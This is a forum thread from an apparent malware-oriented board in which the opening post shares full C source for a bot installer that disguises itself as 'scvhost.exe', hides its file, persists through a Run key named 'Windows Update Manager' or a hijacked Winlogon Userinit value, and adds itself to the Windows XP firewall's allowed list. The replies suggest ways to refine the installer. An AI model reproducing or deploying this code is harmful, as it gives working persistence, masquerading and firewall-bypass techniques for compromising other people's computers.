Autostart after Winlogon, FWBypass. - Remote Administration Tool Research forum

krizzle · #1 (**permalink**) 07-01-2010, 12:35

I was bored today and coded this autostart method,
Detects vista and copy to %appdata% so it can run under the right name.
For all another will create enty under winlogon to start.
And bypass firewall.

Code:

#include <windows.h>
#include <shellapi.h> 
#include <stdio.h>

BOOL IsVista()
{
   OSVERSIONINFO vi;
   ZeroMemory(&vi, sizeof(vi));
   vi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx( &vi );
   return  (vi.dwMajorVersion == 6 );
}

int main()
{
	char appdata[] = "%appdata%";
	char worm_file[] = "scvhost.exe";
	char mutax[] = "D59CIFN53";
	
        //MUTEX
	HANDLE muh;
	muh = CreateMutex(NULL, FALSE, mutax);
	if (GetLastError() == ERROR_ALREADY_EXISTS)
	ExitProcess(0);
	
	//INSTALLER
	HKEY hndKey = NULL;
	char fullpath[MAX_PATH], Path[MAX_PATH], sys[MAX_PATH], vista[MAX_PATH];
	GetModuleFileNameA( GetModuleHandleA(NULL), fullpath, sizeof(fullpath) );
	
	if (IsVista()) 
         {
	  //lets copy to %appdata% 
   	  ExpandEnvironmentStrings(appdata, vista, sizeof(vista));
	  _snprintf( Path, sizeof(Path), "%s\\%s", vista, worm_file);
	  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
	  RegSetValueEx(hndKey,"Windows Update Manager",0, REG_SZ,(const unsigned char *)Path,strlen(Path));
	  RegCloseKey(hndKey);
	 }
 
    else
     { 
	   GetSystemDirectory(sys,MAX_PATH);
       _snprintf( Path, sizeof(Path), "%s\\%s", sys, worm_file ); 
       //fw bypass xp
	   char pfad[256];
	   _snprintf(pfad, sizeof(pfad),"%s:*:Enabled:%s", fullpath, "Userinit");
	   RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hndKey, 0);
	   RegSetValueEx(hndKey, fullpath, 0, REG_SZ, (const unsigned char *)pfad, strlen(pfad));
	   RegCloseKey(hndKey);
	   //winlogon autostart
	   char reqpath[256];
	   _snprintf(reqpath, sizeof(reqpath),"%s\\userinit.exe,%s", sys, Path);
	   RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL, &hndKey, NULL);
	   RegSetValueEx(hndKey, "Userinit", 0, REG_SZ, (const unsigned char *)reqpath, strlen(reqpath));
	   RegCloseKey(hndKey);
	   }

	  if( strcmp( fullpath, Path ) != 0 )
      {
        CopyFileA(fullpath, Path, FALSE);
        SetFileAttributes( Path , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY );
        ShellExecute( NULL, "open", Path, NULL, NULL, SW_HIDE );
		ExitProcess( 0 );
	   }
	   
	return 0;
}

#2 (**permalink**) 07-01-2010, 15:38

thnx krizzle

darrenhzx · #3 (**permalink**) 07-01-2010, 16:00

does this bypass uac?

krizzle · #4 (**permalink**) 07-01-2010, 16:40

No this does not bypass UAC.
It will start under %appdata% bcos this works even on limited accounts under vista/win7 to run under the right file, in this situation it is "scvhost.exe".
You may not belive me but yes... ALOT users simple disable UAC byself, they are just pissed from the popup. Btw the first releases of WIN7 had problems with UAC.

tgunn · #5 (**permalink**) 07-01-2010, 19:07

1) Why not just always copy to %appdata%\SomeSubDirectory\bot.exe?
2) Why not use unicode instead of multi-byte?

raghavpande123 · #6 (**permalink**) 07-01-2010, 19:16

correction:
use createprocess()
in place of:
ShellExecute( NULL, "open", Path, NULL, NULL, SW_HIDE );

becoz shellexecute will call the new process in the context of calling process and once the main process encounters exit(); then the new process will also be killed simultaneously.

krizzle · #7 (**permalink**) 08-01-2010, 00:09

tgunn, wtf are you talkin about?
raghavpande123 you should change this yes, i use the installer in another prog and it works like that...

tgunn · #8 (**permalink**) 08-01-2010, 07:41

I'm simply suggesting that for your install path you should use %appdata% and then some hidden subdirectory and then your exe, no matter what the OS it may be.
Also, I noticed that you specifically call the multibyte version of quite a few API functions, and I am wondering why you don't just do it in unicode instead.

Pernat1y · #9 (**permalink**) 08-01-2010, 10:17

Quote:

Originally Posted by raghavpande123

becoz shellexecute will call the new process in the context of calling process and once the main process encounters exit(); then the new process will also be killed simultaneously.

o rly? o_0

raghavpande123 · #10 (**permalink**) 08-01-2010, 11:00

Quote:

Originally Posted by Pernat1y

o rly? o_0

well yeah ! the new process is also killed with exit function.
on xp service pack 3 it does.
on vista it does.
i dunno abt win7.
are u saying that it doesnt???? becoz if u are then please tell me why??

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Need FUD Winlogon Hijacker	animus	Trojan discussion and general help	0	19-12-2009 22:34
OpenProcessToken cant open Process Winlogon.exe	lobitan1986	Source Code help	3	16-09-2009 11:05
Vista Autostart?	Riddler	Off-topic	0	11-02-2009 12:44
Autostart Manager Example	steve10120	VB Samples	2	09-04-2008 01:23